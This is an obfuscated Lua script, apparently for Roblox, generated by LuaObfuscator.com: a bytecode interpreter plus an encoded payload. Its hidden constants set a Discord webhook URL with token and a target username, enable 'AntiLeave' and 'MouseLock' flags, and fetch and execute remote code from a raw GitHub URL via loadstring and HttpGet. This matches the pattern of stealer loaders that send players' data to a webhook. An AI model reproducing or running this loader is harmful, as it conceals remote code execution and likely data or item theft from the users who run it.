--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v101=v5(v85,v19);v19=nil;return v101;else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=0 -0 ;local v87;while true do if (v86==(0 -0)) then v87=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-(620 -((2192 -(1523 + 114)) + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v87-(v87%(928 -(193 + 21 + 713))) ;end end else local v88=(1 + 1)^(v32-1) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or (877 -((401 -119) + 595)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0;local v36;local v37;while true do if ((1065 -(68 + 997))==v35) then v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + (2 -1) ;v35=1271 -(226 + 1044) ;end if (v35==1) then return (v37 * (1114 -858)) + v36 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -(2 + 0)) );v18=v18 + (7 -3) ;return (v41 * (16777566 -(87 + 263))) + (v40 * (65716 -(67 + 113))) + (v39 * 256) + v38 ;end local function v24()local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + 1 + 0 + 0)) then v47=v20(v44,(855 -(201 + 571)) -62 ,(2121 -(116 + 1022)) -(802 + 150) );v48=((v20(v44,85 -53 )==1) and  -1) or (1 -0) ;v42=3 + 0 ;end if ((1000 -(915 + 82))==v42) then if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * ((0 -0) -0) ;else local v102=1187 -(1069 + 118) ;while true do if (v102==0) then v47=2 -1 ;v45=0 -0 ;break;end end end elseif (v47==(1202 + 845)) then return ((v46==((0 -0) + 0)) and (v48 * (((3 -2) -0)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(1814 -(368 + 423)) ) * (v45 + (v46/((6 -4)^(70 -(10 + 8))))) ;end if (v42==(3 -2)) then v45=443 -(416 + 26) ;v46=(v20(v44,3 -(861 -(814 + 45)) ,9 + 11 ) * ((3 -1)^(470 -(145 + 293)))) + v43 ;v42=432 -(44 + 386) ;end if (v42==0) then v43=v23();v44=v23();v42=1487 -(998 + 488) ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v67=1 + 0 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==4) then while true do if (v53==(1992 -(582 + 1408))) then v58=nil;v59=nil;v53=10 -7 ;end if (v53==(1 + 0)) then local v99=0 + 0 ;while true do if (v99~=(851 -(20 + 830))) then else v53=2 + 0 ;break;end if (v99==(0 -0)) then v56=nil;v57=nil;v99=1 + 0 ;end end end if (v53==0) then local v100=738 -(542 + 196) ;while true do if (v100==(1 -0)) then v53=1;break;end if (v100==(0 + 0)) then v54=0;v55=nil;v100=3 -2 ;end end end if (v53==3) then v60=nil;while true do local v103=0 + 0 ;while true do if (v103==(1824 -(1195 + 629))) then if (v54==(2 -1)) then local v135=0;local v136;while true do if (v135~=(0 -0)) then else v136=1551 -(1126 + 425) ;while true do if (v136==(242 -(187 + 54))) then v60={};v54=782 -(162 + 618) ;break;end if (v136==(0 + 0)) then local v168=0 + 0 ;while true do if ((1 -0)==v168) then v136=2 -1 ;break;end if (v168==(0 -0)) then v58={v55,v56,nil,v57};v59=v23();v168=1001 -(451 + 549) ;end end end end break;end end end if ((0 -0)==v54) then local v137=0 + 0 ;while true do if (v137~=(0 -0)) then else local v165=0;while true do if (v165~=(0 -0)) then else v55={};v56={};v165=1385 -(746 + 638) ;end if (v165==(1 + 0)) then v137=1 -0 ;break;end end end if (v137~=(1 + 0)) then else v57={};v54=342 -(218 + 123) ;break;end end end v103=1582 -(1535 + 46) ;end if ((1 + 0)==v103) then if (v54~=(1 + 1)) then else local v138=0 + 0 ;local v139;while true do if (v138==(560 -(306 + 254))) then v139=0;while true do if (v139==(0 + 0)) then local v169=0 -0 ;local v170;while true do if (v169==(753 -(239 + 514))) then v170=0 -0 ;while true do if (v170==(1 + 0)) then v139=1468 -(899 + 568) ;break;end if (v170==(0 + 0)) then for v180=1 + 0 ,v59 do local v181=0 -0 ;local v182;local v183;local v184;while true do if (v181~=(1202 -(373 + 829))) then else v182=0 + 0 ;v183=nil;v181=732 -(476 + 255) ;end if (v181==(2 -1)) then v184=nil;while true do if ((603 -(268 + 335))==v182) then local v195=290 -(60 + 230) ;local v196;while true do if (v195==(572 -(426 + 146))) then v196=0;while true do if (v196==(0 + 0)) then local v204=0;while true do if (1==v204) then v196=1 + 0 ;break;end if (v204~=(1456 -(282 + 1174))) then else v183=v21();v184=nil;v204=812 -(569 + 242) ;end end end if (1~=v196) then else v182=1;break;end end break;end end end if (v182~=(1 -0)) then else if (v183==(2 -1)) then v184=v21()~=(0 + 0) ;elseif (v183==(2 -0)) then v184=v24();elseif (v183==(339 -(144 + 192))) then v184=v25();end v60[v180]=v184;break;end end break;end end end v58[219 -(42 + 174) ]=v21();v170=1025 -(706 + 318) ;end end break;end end end if (v139==1) then for v171=1252 -(721 + 530) ,v23() do local v172=1271 -(945 + 326) ;local v173;while true do if (v172~=0) then else v173=v21();if (v20(v173,1 + 0 ,1 + 0 )~=(0 -0)) then else local v176=0 + 0 ;local v177;local v178;local v179;while true do if (v176~=(1 + 1)) then else local v187=1504 -(363 + 1141) ;local v188;while true do if (v187~=0) then else v188=1580 -(1183 + 397) ;while true do if ((700 -(271 + 429))==v188) then local v201=0;while true do if (v201==(0 + 0)) then if (v20(v178,1 + 0 ,1501 -(1408 + 92) )==(1 + 0)) then v179[1088 -(461 + 625) ]=v60[v179[2]];end if (v20(v178,2,1290 -(993 + 295) )==1) then v179[1 + 2 ]=v60[v179[1664 -(1477 + 184) ]];end v201=1 -0 ;end if (v201~=1) then else v188=1172 -(418 + 753) ;break;end end end if (v188==(1 + 0)) then v176=859 -(564 + 292) ;break;end end break;end end end if (v176~=(0 + 0)) then else local v189=0 + 0 ;while true do if ((305 -(244 + 60))~=v189) then else v176=1 + 0 ;break;end if (v189~=0) then else local v194=529 -(406 + 123) ;while true do if (v194==1) then v189=1;break;end if (v194~=(1769 -(1749 + 20))) then else v177=v20(v173,2,1 + 2 );v178=v20(v173,1129 -(936 + 189) ,1328 -(1249 + 73) );v194=1 + 0 ;end end end end end if (v176==(1 + 2)) then if (v20(v178,3,1616 -(1565 + 48) )==(1146 -(466 + 679))) then v179[9 -5 ]=v60[v179[4]];end v55[v171]=v179;break;end if ((1 + 0)==v176) then local v191=0;while true do if (1~=v191) then else v176=1140 -(782 + 356) ;break;end if ((267 -(176 + 91))~=v191) then else v179={v22(),v22(),nil,nil};if (v177==0) then local v198=0 -0 ;local v199;local v200;while true do if (v198==(0 + 0)) then v199=1900 -(106 + 1794) ;v200=nil;v198=1 + 0 ;end if (v198==(1 + 0)) then while true do if (v199~=0) then else v200=0 -0 ;while true do if (v200==(1018 -(697 + 321))) then v179[7 -4 ]=v22();v179[118 -(4 + 110) ]=v22();break;end end break;end end break;end end elseif (v177==(585 -(57 + 527))) then v179[1430 -(41 + 1386) ]=v23();elseif (v177==2) then v179[106 -(17 + 86) ]=v23() -((2 + 0)^16) ;elseif (v177~=(2 + 1)) then else local v209=0 -0 ;while true do if (v209==0) then v179[6 -3 ]=v23() -((5 -3)^(182 -(122 + 44))) ;v179[4]=v22();break;end end end v191=612 -(602 + 9) ;end end end end end break;end end end v54=1192 -(449 + 740) ;break;end end break;end end end if (v54==3) then local v140=0 -0 ;local v141;local v142;while true do if (v140~=(0 -0)) then else v141=0 + 0 ;v142=nil;v140=1 + 0 ;end if (v140==(1 -0)) then while true do if (v141==0) then v142=0;while true do if (v142==(0 + 0)) then local v174=1898 -(260 + 1638) ;while true do if (v174~=(65 -(30 + 35))) then else for v185=1,v23() do v56[v185-1 ]=v28();end return v58;end end end end break;end end break;end end end break;end end end break;end end break;end if (v52==1) then local v92=0 + 0 ;while true do if (v92==1) then v52=2 + 0 ;break;end if (v92~=(1257 -(1043 + 214))) then else v55=nil;v56=nil;v92=1;end end end if ((11 -8)==v52) then v59=nil;v60=nil;v52=4;end if (v52==(1212 -(323 + 889))) then local v93=0 -0 ;while true do if (1==v93) then v52=581 -(361 + 219) ;break;end if (v93~=(1205 -(902 + 303))) then else v53=320 -(53 + 267) ;v54=nil;v93=1 + 0 ;end end end if (v52==2) then local v94=0;while true do if (v94~=(0 -0)) then else v57=nil;v58=nil;v94=414 -(15 + 398) ;end if (v94~=(1691 -(1121 + 569))) then else v52=217 -(22 + 192) ;break;end end end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=9) then if (v82<=4) then if (v82<=1) then if (v82==0) then local v104=0;local v105;local v106;while true do if (v104==0) then v105=v81[2];v106=v79[v81[3]];v104=1;end if (v104==1) then v79[v105 + 1 ]=v106;v79[v105]=v106[v81[4]];break;end end else local v107=0;local v108;while true do if (v107==0) then v108=v81[2];v79[v108]=v79[v108](v13(v79,v108 + 1 ,v74));break;end end end elseif (v82<=2) then local v109=0;local v110;local v111;local v112;local v113;while true do if (v109==1) then v74=(v112 + v110) -1 ;v113=0;v109=2;end if (v109==2) then for v161=v110,v74 do local v162=0;while true do if (v162==0) then v113=v113 + 1 ;v79[v161]=v111[v113];break;end end end break;end if (v109==0) then v110=v81[2];v111,v112=v72(v79[v110](v13(v79,v110 + 1 ,v81[3])));v109=1;end end elseif (v82>3) then v79[v81[2]]();else v79[v81[2]][v81[3]]=v81[4];end elseif (v82<=6) then if (v82==5) then v79[v81[2]]=v63[v81[3]];else v63[v81[3]]=v79[v81[2]];end elseif (v82<=7) then v79[v81[2]][v81[3]]=v81[4];elseif (v82==8) then local v145=v81[2];v79[v145]=v79[v145](v13(v79,v145 + 1 ,v74));else v79[v81[2]]=v81[3];end elseif (v82<=14) then if (v82<=11) then if (v82>10) then local v120=v81[2];local v121=v79[v81[3]];v79[v120 + 1 ]=v121;v79[v120]=v121[v81[4]];else do return;end end elseif (v82<=12) then local v125=v81[2];local v126,v127=v72(v79[v125](v13(v79,v125 + 1 ,v81[3])));v74=(v127 + v125) -1 ;local v128=0;for v133=v125,v74 do local v134=0;while true do if (v134==0) then v128=v128 + 1 ;v79[v133]=v126[v128];break;end end end elseif (v82>13) then v79[v81[2]]=v81[3];else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=16) then if (v82==15) then v63[v81[3]]=v79[v81[2]];else do return;end end elseif (v82<=17) then v79[v81[2]]=v63[v81[3]];elseif (v82>18) then v79[v81[2]]();else v79[v81[2]]=v81[3]~=0 ;end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D6503083O00395348574957484503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31343137362O32303933323035342O3239382F662O6E2D493946303550795A556A4832476F497030546975494C584866654F64725A474B5A435A496B7A736A6E6C2O526F776E63647751532D704D5235657873546F704503093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747300153O0012093O00023O0012063O00013O0012093O00043O0012063O00033O0012093O00023O0012063O00053O0012053O00063O0030073O000700080012053O00063O0030073O000900080012053O00063O0030073O000A00080012053O000B3O0012050001000C3O00202O00010001000D0012090003000E4O000D000400014O0002000100044O00015O00022O00043O000100012O00103O00017O00",v9(),...);
